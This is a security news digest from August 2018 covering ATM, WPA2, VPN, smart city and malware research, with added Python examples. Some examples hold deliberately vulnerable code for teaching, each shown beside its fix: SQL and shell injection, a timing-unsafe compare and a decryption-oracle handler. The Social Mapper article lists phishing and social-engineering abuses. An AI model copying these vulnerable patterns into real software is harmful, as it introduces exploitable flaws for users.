* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

Geography of local malware attacks in Q2 2018 (ranked by percentage of users attacked)

On average, 19.58% of computers globally faced at least one Malware-class local threat in Q2.

Flaws in ATM Dispenser Controllers Allowed Hackers to Steal Cash
10.8.2018 securityweek

Researchers have disclosed the details of two serious vulnerabilities affecting ATM currency dispensers made by NCR. The flaws have been patched, but they could have been exploited to install outdated firmware and get ATMs to dispense cash.

Positive Technologies experts Vladimir Kononovich and Alexey Stennikov have conducted a successful black box attack against the NCR S1 and S2 cash dispenser controllers. In these types of attacks, the attacker only sees inputs and outputs, without having any knowledge of the system’s internal workings.

The method, which the researchers described as a “logical attack,” requires physical access to the targeted device. In this particular case, an attacker could have leveraged the poor physical security of the targeted dispenser controller to connect to it, install vulnerable firmware, and issue commands that would instruct the machine to dispense cash.

The experts disclosed their findings this week at the Black Hat security conference in Las Vegas.

Two different security holes have been found that allow an attacker to roll back the firmware to an older, vulnerable version.

One of them is CVE-2017-17668, which affects the S1 controller, and the other is CVE-2018-5717, which affects the S2 controller.

The flaws are similar and they are both related to insufficient protection of the memory write mechanism. They can be exploited by an unauthenticated attacker to execute arbitrary code, bypass the firmware anti-rollback mechanism, and install firmware containing known vulnerabilities, according to Positive Technologies.

“Our research indicated that not all requests from the ATM computer to the dispenser were encrypted. Instead, encryption was applied only to requests deemed critical by the manufacturer, such as dispensing cash. But some of the so-called non-critical requests can be just as dangerous,” said Alexey Stennikov, Head of Hardware Security Analysis at Positive Technologies.

The researchers notified NCR of their findings and the vendor released critical firmware updates in February that should provide better protection against black box attacks. The update should address the firmware rollback vulnerability and it adds an extra layer of protection for physical authentication mechanisms.

“The physical authentication mechanism used to authorize encrypted communications to the dispenser has been strengthened to add protection against an attacker using endoscope technology in an attempt to manipulate dispenser electronics from outside the safe. Additionally, further authentication mechanisms have been added as configuration options,” NCR said in its advisory.
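As an added illustration of the anti-rollback mechanism the advisory refers to, the following Python is example code written for this page, not NCR's firmware and not derived from the Positive Technologies research. It assumes a simple image layout (magic, version, body, HMAC tag) and a device-held update key; both are constructed for the example. What it demonstrates is that a rollback check is only as strong as two things: the version field must be covered by the authentication tag, and the floor the device stores must only ever move upward.

```python
"""Added example: an authenticated firmware-update gate with a monotonic
anti-rollback floor. Illustrative only; it is not NCR's code and says
nothing about how the S1/S2 controllers implement their own check."""
import hashlib
import hmac
import struct

# Constructed 32-byte key standing in for a device-held update key (assumption).
UPDATE_KEY = hashlib.sha256(b"constructed-demo-key").digest()

HEADER = struct.Struct("<4sI")   # magic (4 bytes), version (little-endian uint32)
TAG_LEN = 32


def build_image(version: int, body: bytes, key: bytes = UPDATE_KEY) -> bytes:
    """Build header || body || tag. The version sits inside the MAC'd region,
    so it cannot be edited without invalidating the tag."""
    signed = HEADER.pack(b"FWIM", version) + body
    tag = hmac.new(key, signed, hashlib.sha256).digest()
    return signed + tag


class Controller:
    """State a dispenser controller would keep in non-volatile storage:
    the lowest firmware version it will still accept, and what is running."""

    def __init__(self, min_version: int):
        self.min_version = min_version
        self.running = None

    def verify_image(self, image: bytes, key: bytes = UPDATE_KEY) -> str:
        if len(image) < HEADER.size + TAG_LEN:
            return "reject: truncated"
        signed, tag = image[:-TAG_LEN], image[-TAG_LEN:]
        # 1. Authenticate before trusting any field, with a constant-time compare.
        expected = hmac.new(key, signed, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            return "reject: bad tag"
        magic, version = HEADER.unpack_from(signed)
        if magic != b"FWIM":
            return "reject: bad magic"
        # 2. Anti-rollback: an authentic image older than the floor is still refused.
        if version < self.min_version:
            return f"reject: rollback to v{version} below floor v{self.min_version}"
        return "ok"

    def install(self, image: bytes, key: bytes = UPDATE_KEY) -> str:
        result = self.verify_image(image, key)
        if result == "ok":
            _, version = HEADER.unpack_from(image)
            self.running = version
            # 3. The floor only moves up, so a later downgrade attempt also fails.
            self.min_version = max(self.min_version, version)
        return result
```

Re-flashing the version currently at the floor is still allowed, which is the usual behaviour for a field re-install; only versions strictly below the floor are refused.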

Social Mapper – Correlate social media profiles with facial recognition
10.8.2018 securityaffairs

Trustwave developed Social Mapper an Open Source Tool that uses facial recognition to correlate social media profiles across different social networks.
Security experts at Trustwave have released Social Mapper, a new open-source tool that makes it possible to find a person of interest across social media platforms using facial recognition technology.

The tool was developed to gather intelligence from social networks during penetration tests and is aimed at facilitating social engineering attacks.

Social Mapper facial recognition tool automatically searches for targets across eight social media platforms, including Facebook, Instagram, Twitter, LinkedIn, Google+, VKontakte (The Russian Facebook), and Chinese Weibo and Douban.

An individual can be searched for by providing a name and a picture, and the tool allows analysis to be conducted “on a mass scale with hundreds or thousands of individuals” at once.

“Performing intelligence gathering is a time-consuming process; it typically starts by attempting to find a person’s online presence on a variety of social media sites. While this is an easy task for a few, it can become incredibly tedious when done at scale.” Trustwave states in a blog post.

“Introducing Social Mapper an open source intelligence tool that uses facial recognition to correlate social media profiles across a number of different sites on a large scale. Trustwave, which provides ethical hacking services, has successfully used the tool in a number of penetration tests and red teaming engagements on behalf of clients.”

Social Mapper searches for specific profiles in three stages:

Stage 1—The tool creates a list of targets based on the input you give it. The list can be provided via links in a CSV file, images in a folder or via people registered to a company on LinkedIn.

Stage 2—Once the targets are processed, the second stage kicks in: Social Mapper automatically starts searching social media sites for the targets online.

This stage can be time-consuming: the search could take over 15 hours for lists of 1,000 people and use a significant amount of bandwidth. For this reason, the experts recommend running the tool overnight on a machine with a good internet connection.

Stage 3—Social Mapper generates a variety of output, including a CSV file with links to the profile pages of the target list and a visual HTML report.

Of course, this intelligence-gathering tool could be abused by attackers to collect information for use in highly sophisticated spear-phishing campaigns.

Experts from Trustwave warn of potential abuses of Social Mapper that are limited “only by your imagination.” Attackers can use the results obtained with the tool to:

Create fake social media profiles to ‘friend’ the targets and send them links to credential capturing landing pages or downloadable malware. Recent statistics show social media users are more than twice as likely to click on links and open documents compared to those delivered via email.
Trick users into disclosing their emails and phone numbers with vouchers and offers to make the pivot into phishing, vishing or smishing.
Create custom phishing campaigns for each social media site, knowing that the target has an account. Make these more realistic by including their profile picture in the email. Capture the passwords for password reuse.
View target photos looking for employee access card badges and familiarise yourself with building interiors.
If you want to start using the tool you can find it for free on GitHub.

Trustwave researcher Jacob Wilkin will present Social Mapper at the Black Hat USA conference today.

Researchers Say Code Reuse Links North Korea's Malware
10.8.2018 securityweek Virus

Following trails of reused code, security researchers at Intezer and McAfee have uncovered new links between malware families attributed to North Korean threat groups and tracked most of the samples to the infamous Lazarus Group.

Code reuse isn’t novel, and many cases where cybercriminals and threat actors employed this technique have already been reported on. In fact, actors operating from the same country have often been observed sharing malware code and infrastructure, which frequently makes attribution highly problematic.

For security researchers, the reuse of code between different malware families and variants, and from one campaign to another, means that they can gain insight into the activities of threat actors, and this is exactly what Intezer and McAfee focused on in their recent analysis.

The multiple cyber campaigns attributed to North Korean hackers have been so far focused on two different directions: to raise money or pursue nationalist aims.

Thus there’s a workforce of hackers that focuses on cybercrime activities such as hacking into financial institutions (Unit 180) and another to gather intelligence from other nations and to try to disrupt rival states and military targets (Unit 121).

The researchers focused on the latter and discovered “many overlaps in code reuse,” which led them to the conclusion that nation-state sponsored groups were active in those efforts.

After analyzing thousands of malware samples, many unclassified or uncategorized, the researchers noticed a “significant amount of code similarities between almost every one of the attacks associated with North Korea.”

One similarity was found in the server message block (SMB) module of WannaCry (2017), Mydoom (2009), Joanap, and DeltaAlfa.

The use of these malware families has been already attributed to the Lazarus Group, which is tracked by the U.S. government as Hidden Cobra.

Believed to have orchestrated the $81 million heist from the Bangladesh bank, and seen as the most serious threat to banks, the group is also said to have launched campaigns such as Operation Blockbuster, Dark Seoul, and Operation Troy.

The researchers also noticed a similarity between three different remote access Trojans, namely NavRAT, Gold Dragon, and a DLL from the South Korean gambling hacking campaign, all three believed to be affiliated with Group 123 (also tracked as Reaper, APT37, and ScarCruft).

There’s also a connection between the Brambul malware (2009) and KorDllBot (2011), based on code responsible for launching a cmd.exe with a net share. Both malware families are attributed to Lazarus.

The security researchers also discovered a connection between the Tapaoux (or DarkHotel) malware family and samples from Operation Troy.

The code reuse and sharing between various threat groups known to be affiliated with North Korea has revealed that most malware families link back to Lazarus. The only malware families that stand apart are the RATs attributed to Group 123, which are linked to one another.

“The malware attributed to the group Lazarus has code connections that link many of the malware families spotted over the years. Lazarus is a collective name for many DPRK cyber operations, and we clearly see links between malware families used in different campaigns,” the security researchers note.
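To show what “following trails of reused code” looks like in practice, here is an added example in Python; it is not Intezer's or McAfee's tooling, and the byte strings are constructed stand-ins for disassembled function bodies, not real samples. It reduces each sample to the set of byte n-grams of its functions, scores pairs by Jaccard similarity and clusters samples that share a function, which is the shape of the argument the researchers make (the sample names and the cluster split are illustrative, not the families named above).

```python
"""Added example (not Intezer's or McAfee's tooling): a toy version of the
code-reuse comparison the article describes."""
from itertools import combinations

N = 4             # shingle length in bytes
THRESHOLD = 0.30  # whole-sample score needed to link two samples

# Constructed byte sequences standing in for function bodies. Two "shared"
# functions are copied verbatim into several samples; the rest are unique.
SMB_PROBE = bytes.fromhex(
    "5589e583ec2031c0c745fc0000000066c745f8bd01e8000000008b45fc83c0013945f87cef89ec5dc3")
BEACON = bytes.fromhex(
    "5589e583ec1068e80300006a00e8000000008945f8837df8ff750a6a01e800000000ebe489ec5dc3")
UNIQUE_A = bytes.fromhex("5589e58b45080fb6003c417f025dc390")
UNIQUE_B = bytes.fromhex("5589e58b4d088b510401d05dc3cccccc")
UNIQUE_C = bytes.fromhex("5589e5538b5d0831c085db74028b035b5dc3")
UNIQUE_D = bytes.fromhex("5589e5568b7508ac84c075fb5e5dc390")
UNIQUE_E = bytes.fromhex("5589e5578b7d08b910000000f3aa5f5dc3")

SAMPLES = {                      # sample name -> {function name: bytes}
    "A": {"smb_probe": SMB_PROBE, "payload": UNIQUE_A},
    "B": {"smb_probe": SMB_PROBE, "crypt": UNIQUE_B},
    "C": {"smb_probe": SMB_PROBE, "dropper": UNIQUE_C},
    "D": {"beacon": BEACON, "keylog": UNIQUE_D},
    "E": {"beacon": BEACON, "stager": UNIQUE_E},
}


def shingles(code: bytes, n: int = N) -> set:
    """Set of overlapping n-byte windows; order-insensitive and cheap to compare."""
    return {code[i:i + n] for i in range(len(code) - n + 1)}


def jaccard(a: set, b: set) -> float:
    if not a and not b:
        return 0.0
    return len(a & b) / len(a | b)


def shared_functions(sample_a: dict, sample_b: dict, min_score: float = 0.5) -> list:
    """(func_a, func_b, score) for function pairs whose n-gram sets overlap strongly."""
    out = []
    for fa, ca in sample_a.items():
        for fb, cb in sample_b.items():
            s = jaccard(shingles(ca), shingles(cb))
            if s >= min_score:
                out.append((fa, fb, round(s, 2)))
    return out


def sample_score(sample_a: dict, sample_b: dict) -> float:
    """Whole-sample score over the union of all function shingles."""
    sa = set().union(*(shingles(c) for c in sample_a.values()))
    sb = set().union(*(shingles(c) for c in sample_b.values()))
    return jaccard(sa, sb)


def cluster(samples: dict, threshold: float = THRESHOLD) -> list:
    """Union-find over samples whose pairwise score reaches the threshold."""
    parent = {name: name for name in samples}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for a, b in combinations(samples, 2):
        if sample_score(samples[a], samples[b]) >= threshold:
            parent[find(a)] = find(b)
    groups = {}
    for name in samples:
        groups.setdefault(find(name), []).append(name)
    return sorted(sorted(g) for g in groups.values())
```

A real pipeline would first strip boilerplate such as function prologues and compiler runtime code, since those match across unrelated binaries; here the shared prologue bytes only add a small amount of noise, which is why the threshold is above zero.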

On Thursday, the U.S. Department of Homeland Security (DHS) warned of a new malware variant dubbed KEYMARBLE, which the U.S. government has attributed to malicious cyber activity by the North Korean government. DHS says the malware is a Remote Access Trojan (RAT) capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screenshots, and exfiltrating data. More details on KEYMARBLE are available from the malware report (AR18-221A) from the DHS.

Security expert discovered a bug that affects millions of Kaspersky VPN users
10.8.2018 securityaffairs

A security issue exists in Kaspersky VPN <=v1.4.0.216 which leaks your DNS Address even after you’re connected to any virtual server. (Tested on Android 8.1.0)
What is a DNS leak?

In this context, with the term “DNS leak” we indicate an unencrypted DNS query sent by your system OUTSIDE the established VPN tunnel.

Kaspersky VPN is one of the most trusted VPNs, with over 1,000,000 downloads in the official Google Play Store; however, it was observed that when it connects to any virtual server it still leaks your actual DNS address.

The expert Dhiraj Mishra, who discovered the flaw, reported it to Kaspersky via HackerOne.

Mishra also published a step-by-step guide to reproduce the problem:

Visit IPleak (Note your actual DNS address).
Now, connect to any random virtual server using Kaspersky VPN.
Once you are successfully connected, navigate to IPleak you will observe that the DNS address still remains the same.
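The reproduction steps above rely on an external site. As an added example, not from the researcher's write-up, the Python below checks the same property offline from two constructed inputs in the shape of /etc/resolv.conf and `ip route` output: for each configured resolver it determines which interface the query would leave through by longest-prefix-match routing (what the kernel does), and flags any resolver that is not routed via the tunnel device, assumed here to be tun0.

```python
"""Added example (not part of the original post): decide from a host's
resolver list and routing table whether DNS queries would leave the tunnel."""
import ipaddress

# Constructed /etc/resolv.conf: the VPN pushed 10.8.0.1 but the LAN resolver
# from DHCP was left in place.
RESOLV_CONF = """# constructed sample
nameserver 10.8.0.1
nameserver 192.168.1.1
"""

# Constructed `ip route` output after the VPN came up on tun0.
ROUTES_LEAKY = """
0.0.0.0/1 via 10.8.0.1 dev tun0
128.0.0.0/1 via 10.8.0.1 dev tun0
default via 192.168.1.1 dev wlan0
10.8.0.0/24 dev tun0 scope link
192.168.1.0/24 dev wlan0 scope link
"""


def parse_resolvers(text: str) -> list:
    return [line.split()[1] for line in text.splitlines()
            if line.strip().startswith("nameserver")]


def parse_routes(text: str) -> list:
    """Return (network, dev) tuples; 'default' means 0.0.0.0/0."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or "dev" not in parts:
            continue
        dest = "0.0.0.0/0" if parts[0] == "default" else parts[0]
        net = ipaddress.ip_network(dest, strict=False)
        routes.append((net, parts[parts.index("dev") + 1]))
    return routes


def egress_interface(ip: str, routes: list):
    """Longest-prefix match: the most specific route containing ip wins."""
    addr = ipaddress.ip_address(ip)
    best = None
    for net, dev in routes:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, dev)
    return best[1] if best else None


def dns_leaks(resolv_text: str, route_text: str, vpn_dev: str = "tun0") -> list:
    """(resolver, egress device) for every resolver not routed via the VPN."""
    routes = parse_routes(route_text)
    leaks = []
    for resolver in parse_resolvers(resolv_text):
        dev = egress_interface(resolver, routes)
        if dev != vpn_dev:
            leaks.append((resolver, dev))
    return leaks
```

Note the two /1 routes: that is the common VPN trick for overriding the default route without deleting it, and it is exactly why a LAN resolver covered by a more specific /24 still escapes the tunnel.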

The expert explained that the data leak could threaten the privacy of end-users that want to remain anonymous on the internet.

“I believe this leaks the traces of an end user, who wants to remain anonymous on the internet. I reported this vulnerability on Apr 21st (4 months ago) via H1, and a fix was pushed for the same but no bounty was awarded.” states Mishra.

The expert reported this vulnerability to Kaspersky on Apr 21st via HackerOne, and a fix was pushed for the issue.

Unfortunately, the researcher was not awarded a bounty under the company’s bug bounty program.

DeepLocker – AI-powered malware is already among us
10.8.2018 securityaffairs

Security researchers at IBM Research developed a “highly targeted and evasive” AI-powered malware dubbed DeepLocker and will present it today.
What about Artificial Intelligence (AI) applied to malware development? Threat actors can use AI-powered malware to create malicious code that evades sophisticated defenses.
Security researchers at IBM Research developed a “highly targeted and evasive” attack tool powered by AI, dubbed DeepLocker, that is able to conceal its malicious intent until it has infected the specific target.

“IBM Research developed DeepLocker to better understand how several existing AI models can be combined with current malware techniques to create a particularly challenging new breed of malware.” reads a blog post published by the experts.

“This class of AI-powered evasive malware conceals its intent until it reaches a specific victim. It unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition.”

According to the IBM researchers, DeepLocker is able to avoid detection and activates itself only after specific conditions are met.
AI-powered malware represents a privileged option in highly targeted attacks like the ones carried out by nation-state actors.
The malicious code could be concealed in benign applications and select the target based on various indicators such as voice recognition, facial recognition, geolocation and other system-level features.
“DeepLocker hides its malicious payload in benign carrier applications, such as a video conference software, to avoid detection by most antivirus and malware scanners.” continues IBM.

“What is unique about DeepLocker is that the use of AI makes the “trigger conditions” to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model.”

The researchers shared a proof of concept by hiding the WannaCry ransomware in a video conferencing app and keeping it dormant until the victim is identified through facial recognition. The experts pointed out that the target can be identified by matching their face with publicly available photos.

“To demonstrate the implications of DeepLocker’s capabilities, we designed a proof of concept in which we camouflage a well-known ransomware (WannaCry) in a benign video conferencing application so that it remains undetected by malware analysis tools, including antivirus engines and malware sandboxes. As a triggering condition, we trained the AI model to recognize the face of a specific person to unlock the ransomware and execute on the system.”

“Imagine that this video conferencing application is distributed and downloaded by millions of people, which is a plausible scenario nowadays on many public platforms. When launched, the app would surreptitiously feed camera snapshots into the embedded AI model, but otherwise behave normally for all users except the intended target,” the researchers added.

“When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.”

The IBM Research group will provide further details today in a live demo at the Black Hat USA security conference in Las Vegas.

Researchers Find Flaws in WPA2's 4-way Handshake Implementations
9.8.2018 securityweek

Researchers have discovered several security vulnerabilities in implementations of the Wi-Fi Protected Access II (WPA2) 4-way handshake, which is used by nearly all protected Wi-Fi networks.

The discovery was the result of simulating cryptographic primitives during symbolic execution for the analysis of security protocol implementations, KU Leuven researchers Mathy Vanhoef and Frank Piessens explain in a recently published whitepaper (PDF).

By applying the technique on three client-side implementations of WPA2’s 4-way handshake, the researchers discovered timing side-channels when verifying authentication tags, a denial-of-service attack, a stack-based buffer overflow, and a non-trivial decryption oracle.

Through symbolic execution, the researchers explain, one aims to exhaustively explore all code paths of a program by running it on symbolic inputs instead of concrete ones. For their experiments, the researchers implemented the technique on top of the KLEE symbolic execution engine, which they modified to handle cryptographic primitives.

Of the three tested implementations, two were found susceptible to trivial timing side-channels, because they verify authentication tags using timing-unsafe memory compares.

The researchers found a denial of service in Intel’s iwd daemon (iNet wireless daemon) and a stack-based buffer overflow (in code that processes decrypted data) in MediaTek’s implementation, both of which can be triggered by a malicious access point (AP). The AES unwrap algorithm was also found to be incorrectly implemented in MediaTek’s code.

Furthermore, wpa_supplicant (a cross-platform supplicant with support for WEP, WPA and WPA2 (IEEE 802.11i)) was found vulnerable to a non-trivial decryption oracle caused by processing decrypted but unauthenticated data. Tracked as CVE-2018-14526, the bug can be exploited to recover sensitive information.

“This decryption oracle can be exploited when the victim connects to a WPA2 network using the old TKIP encryption algorithm. It can be abused to decrypt the group key transported in message 3 of the 4-way handshake,” the researchers note.

The attack, however, is only possible if WPA2 is used and if the client selects TKIP as the pairwise cipher, so that the RC4 stream cipher is used to encrypt the key data field (if CCMP is selected, AES is used to protect the key data field). Both conditions are met when the Wi-Fi network uses WPA2 and only supports TKIP (in 2016, 20% of protected Wi-Fi networks used this configuration).

The flaw allows an attacker to decrypt the group key transported in message 3 of WPA2’s 4-way handshake and use it to inject both broadcast and unicast traffic. Furthermore, the key could be used to decrypt unicast and broadcast traffic, the research paper claims.

“We successfully applied symbolic execution to client-side implementations of the 4-way handshake of WPA2, by simulating cryptographic primitives, and constraining parts of the symbolic input to prevent excessive state explosions. This revealed memory corruptions in code that processes decrypted data, uncovered insecure implementations of cryptographic primitives, and even revealed a decryption oracle,” the researchers note.
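Two of the findings, the timing-unsafe tag comparison and the oracle created by processing decrypted-but-unauthenticated key data, come down to a compare routine and the order of operations in the message 3 handler. The Python below is an added example written for this page, not code from the paper or from any supplicant. It uses HMAC-SHA1 for the MIC as WPA2 does, but the key-data cipher is a labelled XOR stand-in (not RC4 or AES key wrap) so the block runs offline; the frame layout and keys are constructed. It places the vulnerable handler beside the hardened one so the difference in what an unauthenticated sender can observe is explicit.

```python
"""Added example (not from the paper or any supplicant): client-side handling
of an EAPOL-Key message 3 reduced to the two properties the paper examines."""
import hashlib
import hmac
import struct

MIC_LEN = 16
KCK = hashlib.sha256(b"constructed-kck").digest()[:16]   # constructed MIC key
KEK = hashlib.sha256(b"constructed-kek").digest()[:16]   # constructed key-data key
HDR_LEN = 3                                              # constructed header size


def keystream(key: bytes, n: int) -> bytes:
    """Stand-in for RC4/AES key wrap: deterministic bytes derived from the key.
    Not a real cipher; it only makes wrap/unwrap reversible for the example."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def wrap_key_data(plain: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(plain, keystream(KEK, len(plain))))


unwrap_key_data = wrap_key_data   # XOR is its own inverse


def compute_mic(frame: bytes) -> bytes:
    """MIC over the frame with the MIC field zeroed, as in EAPOL-Key."""
    zeroed = frame[:HDR_LEN] + b"\x00" * MIC_LEN + frame[HDR_LEN + MIC_LEN:]
    return hmac.new(KCK, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_msg3(group_key: bytes) -> bytes:
    """header || mic || keydata_len (2 bytes) || wrapped key data (KDE-like TLV)."""
    key_data = wrap_key_data(b"\xdd" + bytes([len(group_key)]) + group_key)
    frame = b"\x02\x13\xca" + b"\x00" * MIC_LEN + struct.pack(">H", len(key_data)) + key_data
    return frame[:HDR_LEN] + compute_mic(frame) + frame[HDR_LEN + MIC_LEN:]


def split(frame: bytes):
    mic = frame[HDR_LEN:HDR_LEN + MIC_LEN]
    rest = frame[HDR_LEN + MIC_LEN:]
    n = struct.unpack(">H", rest[:2])[0]
    return mic, rest[2:2 + n]


def leaky_compare(a: bytes, b: bytes) -> bool:
    """Early-exit byte loop: elapsed time reveals how many leading bytes match.
    This is the timing-unsafe memcmp pattern the paper found in two clients."""
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False
    return True


def parse_key_data(plain: bytes):
    if not plain or plain[0] != 0xDD or 2 + plain[1] > len(plain):
        return None
    return plain[2:2 + plain[1]]


def handle_msg3_vulnerable(frame: bytes):
    """Bug pattern: key data is unwrapped and parsed before the MIC is checked,
    so a forged frame yields a different error depending on its key data."""
    mic, key_data = split(frame)
    gtk = parse_key_data(unwrap_key_data(key_data))
    if gtk is None:
        return "error: bad key data"       # observable before authentication
    if not leaky_compare(compute_mic(frame), mic):
        return "error: bad mic"
    return gtk


def handle_msg3_hardened(frame: bytes):
    """Verify first, in constant time; only then unwrap and parse."""
    mic, key_data = split(frame)
    if not hmac.compare_digest(compute_mic(frame), mic):
        return "error: bad mic"            # the only outcome for a forged frame
    gtk = parse_key_data(unwrap_key_data(key_data))
    return "error: bad key data" if gtk is None else gtk
```

In the vulnerable handler a forged frame is answered with either “bad key data” or “bad mic” depending on what the unauthenticated ciphertext decrypts to, which is the distinguishing signal a decryption oracle needs; the hardened handler gives one answer for every forgery, and the constant-time compare removes the byte-by-byte timing signal on the MIC itself.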

Earlier this week, developers of the popular password cracking tool Hashcat identified a new method that can in some cases be used to obtain a network’s Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access II (WPA2) password.

Flaws in Smart City Systems Can Allow Hackers to Cause Panic
9.8.2018 securityweek

Critical vulnerabilities discovered in smart city systems from several vendors can allow malicious actors to perform various actions that could lead to widespread panic, researchers warn.

The world’s major cities are increasingly reliant on smart technologies, including for traffic management, disaster detection and response, and remotely controlling utilities. These systems communicate via protocols such as 4G, ZigBee and Wi-Fi.

Following the recent accidental false missile alert in Hawaii, experts at Threatcare and IBM X-Force Red have decided to join forces and analyze smart city technologies to see if they are affected by any vulnerabilities that could be exploited to intentionally cause panic.

Researchers from the two companies analyzed products from Echelon, Libelium and Battelle. Their tests led to the discovery of 17 previously unknown vulnerabilities across four types of smart city products, including eight security holes described as “critical” and six as “high severity.”

In the case of Echelon, the companies tested i.LON 100 and 600 routers, which allow organizations to monitor and control LonWorks devices such as pumps, valves, motors, sensors and lights. They also analyzed the vendor’s SmartServer products, described as a “versatile controller, router, and smart energy manager that connects control devices to IP-based applications such as building automation, enterprise energy management, demand response programs, and high-value remote asset management programs.”

A total of five vulnerabilities were discovered in these systems, including two critical flaws allowing authentication bypass, as well as default credentials, plaintext passwords, and a lack of encrypted communications. ICS-CERT recently published an advisory describing some of the issues identified by IBM and Threatcare.

In the case of Libelium, which specializes in hardware for wireless sensor networks, researchers analyzed Meshlium, an IoT gateway designed for connecting sensors to any cloud platform. Four distinct instances of a pre-authentication shell injection flaw were discovered in the product, and they have all been classified as “critical.”

As for Battelle, a global research and development organization, IBM and Threatcare analyzed two versions of its V2I (vehicle-to-infrastructure) Hub product, which is used for communicating data from traffic signal controllers to connected vehicles.

The list of vulnerabilities found in these systems includes SQL injection, hardcoded passwords, unprotected sensitive functionality, cross-site scripting (XSS) flaws, and various API-related issues. A majority of these security holes have been assigned either a “critical” or “high severity” rating.
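Two of the vulnerability classes listed, SQL injection and shell injection through a pre-authentication request parameter, are shown below as an added example in Python; it is not code from Echelon, Libelium or Battelle, and the sensor table, handler names and inputs are constructed. Each vulnerable pattern sits next to the fix: bound parameters for the query, and an argv list plus an allowlist check for the command.

```python
"""Added example (not from any of the products named above): the vulnerable
and hardened forms of two request handlers on a constructed sensor gateway."""
import ipaddress
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for a gateway's sensor registry (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sensors (id INTEGER PRIMARY KEY, name TEXT, site TEXT, reading REAL)")
    db.executemany("INSERT INTO sensors (name, site, reading) VALUES (?, ?, ?)", [
        ("river-01", "public", 1.2),
        ("river-02", "public", 1.4),
        ("rad-07", "restricted", 0.03),
    ])
    return db


def lookup_vulnerable(db, name: str) -> list:
    """String-built query: the parameter becomes part of the SQL grammar, so a
    quote in it can widen the WHERE clause past the site restriction."""
    sql = "SELECT name FROM sensors WHERE site='public' AND name='%s'" % name
    return [row[0] for row in db.execute(sql)]


def lookup_hardened(db, name: str) -> list:
    """Bound parameter: the value is data and can never close the literal."""
    rows = db.execute("SELECT name FROM sensors WHERE site='public' AND name=?", (name,))
    return [row[0] for row in rows]


# Allowlist for the host parameter of a diagnostic "ping" endpoint:
# an IP address, or RFC-1123-style labels joined by dots.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def ping_cmd_vulnerable(host: str) -> str:
    """Single string meant for a shell (shell=True): any shell metacharacter
    in host is interpreted as part of the command line."""
    return "ping -c 1 " + host


def safe_ping_argv(host: str) -> list:
    """argv list for subprocess with no shell, after an allowlist check.
    Two layers: the list form keeps host a single argument, and the check
    rejects anything that is not a plausible address or hostname."""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        if not HOSTNAME_RE.match(host):
            raise ValueError("rejected host parameter: %r" % host)
    return ["ping", "-c", "1", host]
```

The vulnerable lookup returns the restricted radiation sensor for a textbook input because `AND` binds tighter than `OR`; the bound-parameter version returns nothing for the same input. For the command, the argv list alone already prevents shell interpretation; the allowlist is defence in depth against arguments the target program itself might misread.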

All the affected vendors have been notified and they have addressed the vulnerabilities.

Battelle has clarified that V2I Hub is a 2.5-year project that it’s working on for the Federal Highway Administration. The project is ongoing – it’s expected to be finished at the end of September – and it has only been deployed for testing purposes. Battelle told SecurityWeek that it fixed the flaws found by IBM in early July.

However, the discovery of these basic security holes shows that smart city systems are highly exposed to cyberattacks.

While there is no evidence of malicious attacks exploiting the vulnerabilities found as part of this research project, the companies warned that the risks are significant.

Worryingly, online searches conducted using Shodan and Censys showed that there are tens or hundreds of vulnerable systems accessible directly from the Internet. Some of them have been found to belong to a European country that uses vulnerable devices to detect radiation, and a major U.S. city that relies on them for traffic monitoring.

“According to our logical deductions, if someone, supervillain or not, were to abuse vulnerabilities like the ones we documented in smart city systems, the effects could range from inconvenient to catastrophic,” researchers said.

In a theoretical attack scenario described by the experts, an attacker exploits the vulnerabilities to manipulate data from water level sensors to indicate a flood, which could create panic. In addition, hackers could make the water level appear normal during a flood.

Hackers could also cause mass panic by manipulating data from radiation sensors in order to trigger radiation leak warnings.

Hijacking traffic systems can also have serious consequences. Attackers can cause chaos by controlling traffic signals, and create additional panic by setting off building and emergency alarms, and triggering gunshot sensors.

New G Suite Alerts Provide Visibility Into Suspicious User Activity
9.8.2018 securityweek Security

After bringing alerts on state-sponsored attacks to G Suite last week, Google is now also providing administrators with increased visibility into user behavior to help identify suspicious activity.

Courtesy of newly introduced reports, G Suite administrators can keep an eye on account actions that seem suspicious and can also choose to receive alerts when critical actions are performed.

Admins can set alerts for password changes, and can also receive warnings when users enable or disable two-step verification or when they change account recovery information such as phone number, security questions, and recovery email.

By providing admins with visibility into these actions, Google aims at making it easier to identify suspicious account behavior and detect when user accounts may have been compromised.

Should an admin notice that a user has changed both the password and the password recovery info, which could be a sign that the account has been hijacked, they can leverage the reports to track time and IP address and determine if the change indeed seems suspicious.

Based on the findings, the G Suite administrator could then take the appropriate action to mitigate the issue and restore the user account, such as resetting the password and disabling 2-step verification.

Admins can also use the new reports to gain visibility into an organization's security initiatives, such as monitoring a domain-wide initiative to increase the adoption of two-step verification.

Access to these reports is available in Admin console > Reports > Audit > Users Accounts.

The new capabilities are set to gradually roll out to all G Suite editions and should become available to all customers within the next two weeks.

